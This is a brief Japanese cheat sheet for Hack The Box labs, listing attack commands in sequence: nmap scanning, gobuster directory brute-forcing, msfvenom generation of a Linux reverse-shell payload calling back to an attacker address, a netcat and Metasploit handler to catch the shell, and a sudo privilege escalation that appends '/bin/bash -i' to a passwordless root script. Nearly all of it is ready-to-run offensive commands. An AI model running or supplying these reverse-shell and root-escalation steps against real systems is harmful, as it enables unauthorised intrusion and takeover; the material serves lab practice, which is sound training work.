Skip to content

HTB CheatSheet

ポートの特定を行う。

Terminal window
nmap -sC -sV -oN nmap/initial $IP

Webサーバが公開しているファイルやディレクトリの特定を行う。

Terminal window
gobuster dir -u http://${IP} -w /usr/share/wordlists/dirb/common.txt
gobuster dir -u http://${IP} -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt -k

ペイロードを作成する。

Terminal window
msfvenom -p linux/x64/shell_reverse_tcp LHOST=172.0.0.1 LPORT=4444 -f elf -o shell.elf

作成したペイロードを実行し、リバースシェルを確立する。

Terminal window
nc -lvnp 4444
msfconsole
use exploit/multi/handler
set payload linux/x64/shell_reverse_tcp
run (exploit)

sudo権限の確認を行う。

Terminal window
sudo -l

上のコマンドで、(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh という結果が得られた場合、monitor.shを編集することで、root権限でコマンドを実行できる。

Terminal window
echo "/bin/bash -i" >> /home/nibbler/personal/stuff/monitor.sh
sudo ./monitor.sh